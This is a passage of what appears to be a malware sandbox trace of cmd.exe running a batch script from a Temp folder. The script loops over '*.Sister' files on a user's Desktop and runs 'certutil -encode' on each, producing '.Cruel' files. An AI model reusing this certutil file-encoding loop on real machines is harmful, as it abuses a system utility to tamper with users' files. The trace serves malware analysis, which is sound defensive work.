0x21ed9379db0 [0203.176] GetProcessHeap () returned 0x21ed8c70000 [0203.176] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0203.177] _tell (_FileHandle=3) returned 322 [0203.178] _close (_FileHandle=3) returned 0 [0203.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0203.179] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0203.179] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=322, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x142 [0203.179] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x142 [0203.179] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x3bb, lpOverlapped=0x0) returned 1 [0203.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x182 [0203.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=64, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 64 [0203.179] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.179] GetFileType (hFile=0x98) returned 0x1 [0203.179] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x182 [0203.180] GetProcessHeap () returned 0x21ed8c70000 [0203.180] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0203.180] GetProcessHeap () returned 0x21ed8c70000 [0203.180] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0203.181] _wcsicmp (_String1="for", _String2=")") returned 61 [0203.181] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0203.181] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96100 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7c9a0 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e30 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.181] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e30, Size=0x18) returned 0x21ed8c95ac0 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.181] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ac0) returned 0x18 [0203.181] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0203.181] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0203.181] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0203.181] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0203.181] _wcsicmp (_String1="IN", _String2="in") returned 0 [0203.181] GetProcessHeap () returned 0x21ed8c70000 [0203.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45d40 [0203.182] _wcsicmp (_String1="DO", _String2="do") returned 0 [0203.182] _wcsicmp (_String1="certutil", _String2=")") returned 58 [0203.182] _wcsicmp (_String1="FOR", _String2="certutil") returned 3 [0203.182] _wcsicmp (_String1="FOR/?", _String2="certutil") returned 3 [0203.182] _wcsicmp (_String1="IF", _String2="certutil") returned 6 [0203.182] _wcsicmp (_String1="IF/?", _String2="certutil") returned 6 [0203.182] _wcsicmp (_String1="REM", _String2="certutil") returned 15 [0203.182] _wcsicmp (_String1="REM/?", _String2="certutil") returned 15 [0203.182] GetProcessHeap () returned 0x21ed8c70000 [0203.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c95f80 [0203.182] GetProcessHeap () returned 0x21ed8c70000 [0203.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45c50 [0203.182] GetProcessHeap () returned 0x21ed8c70000 [0203.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bd00 [0203.182] _tell (_FileHandle=3) returned 386 [0203.182] _close (_FileHandle=3) returned 0 [0203.183] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0203.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.183] GetFileType (hFile=0x50) returned 0x2 [0203.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.183] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0203.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.184] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0203.190] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0203.190] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0203.190] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0203.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.190] GetFileType (hFile=0x50) returned 0x2 [0203.190] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.190] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0203.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.193] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x18) returned 1 [0203.193] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0203.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.193] GetFileType (hFile=0x50) returned 0x2 [0203.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.193] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0203.194] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.194] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0203.195] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0203.195] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.196] GetFileType (hFile=0x50) returned 0x2 [0203.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.196] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0203.196] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.196] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0203.197] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*.Sister) do ") returned 14 [0203.197] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.197] GetFileType (hFile=0x50) returned 0x2 [0203.197] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.197] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0203.197] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.197] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0xe) returned 1 [0203.198] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.198] GetFileType (hFile=0x50) returned 0x2 [0203.198] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.198] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0203.198] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.198] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d45c60*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8d45c60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x8) returned 1 [0203.199] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" -encode \"%~a\" \"%~na.Cruel\" ") returned 28 [0203.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.199] GetFileType (hFile=0x50) returned 0x2 [0203.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.199] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0203.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.199] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0203.200] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0203.200] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.200] GetFileType (hFile=0x50) returned 0x2 [0203.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.200] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0203.201] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.201] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0203.210] malloc (_Size=0xffce) returned 0x21ed8e90940 [0203.210] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0203.210] GetProcessHeap () returned 0x21ed8c70000 [0203.210] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cac0 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95620 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c959c0 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8710 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8710, Size=0x24) returned 0x21ed8d45c80 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c80) returned 0x24 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45dd0 [0203.211] FindFirstFileExW (in: lpFileName="*.Sister", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cb20 [0203.211] GetProcessHeap () returned 0x21ed8c70000 [0203.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31780 [0203.212] _wcsicmp (_String1="*.Sister", _String2=".") returned -4 [0203.212] _wcsicmp (_String1="*.Sister", _String2="..") returned -4 [0203.212] GetFileAttributesW (lpFileName="*.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\*.sister")) returned 0xffffffff [0203.213] GetLastError () returned 0x7b [0203.213] GetProcessHeap () returned 0x21ed8c70000 [0203.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45ce0 [0203.213] GetProcessHeap () returned 0x21ed8c70000 [0203.213] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45ce0, Size=0x54) returned 0x21ed8c7d060 [0203.213] GetProcessHeap () returned 0x21ed8c70000 [0203.213] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d060) returned 0x54 [0203.213] GetProcessHeap () returned 0x21ed8c70000 [0203.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0203.214] GetProcessHeap () returned 0x21ed8c70000 [0203.214] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379db0, Size=0x58) returned 0x21ed9379db0 [0203.214] GetProcessHeap () returned 0x21ed8c70000 [0203.214] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379db0) returned 0x58 [0203.214] GetProcessHeap () returned 0x21ed8c70000 [0203.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379e20 [0203.214] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0203.214] GetProcessHeap () returned 0x21ed8c70000 [0203.214] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7c0c0 [0203.214] ??_V@YAXPEAX@Z () returned 0x1 [0203.215] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0203.215] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd60 [0203.215] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0203.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0203.215] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0203.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa38fb371, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa38fb371, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0203.215] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0203.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f0e7c0, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0xb506470, ftLastAccessTime.dwHighDateTime=0x1d5e6fd, ftLastWriteTime.dwLowDateTime=0xb506470, ftLastWriteTime.dwHighDateTime=0x1d5e6fd, nFileSizeHigh=0x0, nFileSizeLow=0x10be7, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kL8UpxhMP3oFa.avi.Sister", cAlternateFileName="0KL8UP~1.SIS")) returned 0x21ed8c7cf40 [0203.216] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0203.216] _wcsnicmp (_String1="0KL8UP~1.SIS", _String2="0kL8UpxhMP3oFa.avi.Sister", _MaxCount=0x19) returned 6 [0203.216] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0203.217] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0203.218] GetProcessHeap () returned 0x21ed8c70000 [0203.218] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8690 [0203.218] ??_V@YAXPEAX@Z () returned 0x1 [0203.218] ??_V@YAXPEAX@Z () returned 0x1 [0203.218] GetProcessHeap () returned 0x21ed8c70000 [0203.218] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379e20, Size=0x210) returned 0x21ed9379e20 [0203.218] GetProcessHeap () returned 0x21ed8c70000 [0203.218] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379e20) returned 0x210 [0203.218] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0203.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.218] GetFileType (hFile=0x50) returned 0x2 [0203.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.219] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0203.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.219] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0203.226] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0203.226] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0203.226] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0203.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.226] GetFileType (hFile=0x50) returned 0x2 [0203.226] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.226] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0203.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.226] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0203.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.227] GetFileType (hFile=0x50) returned 0x2 [0203.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.227] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0203.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.227] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9379dc0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed9379dc0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0203.228] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\" ") returned 64 [0203.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.228] GetFileType (hFile=0x50) returned 0x2 [0203.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.228] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0203.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0203.229] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0203.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.229] GetFileType (hFile=0x50) returned 0x2 [0203.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0203.229] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0203.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.230] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0203.272] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0203.272] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0203.272] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0203.273] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0203.273] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0203.273] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0203.273] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0203.273] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0203.273] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0203.273] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0203.273] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0203.273] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0203.273] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0203.273] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0203.273] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0203.273] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0203.273] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0203.273] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0203.273] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0203.273] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0203.273] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0203.273] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0203.273] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0203.273] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0203.273] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0203.273] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0203.273] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0203.273] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0203.273] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0203.274] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0203.274] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0203.274] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0203.274] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0203.274] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0203.274] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0203.274] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0203.274] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0203.274] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0203.274] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0203.274] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0203.274] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0203.274] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0203.274] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0203.274] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0203.274] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0203.274] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0203.274] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0203.274] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0203.274] _wcsicmp 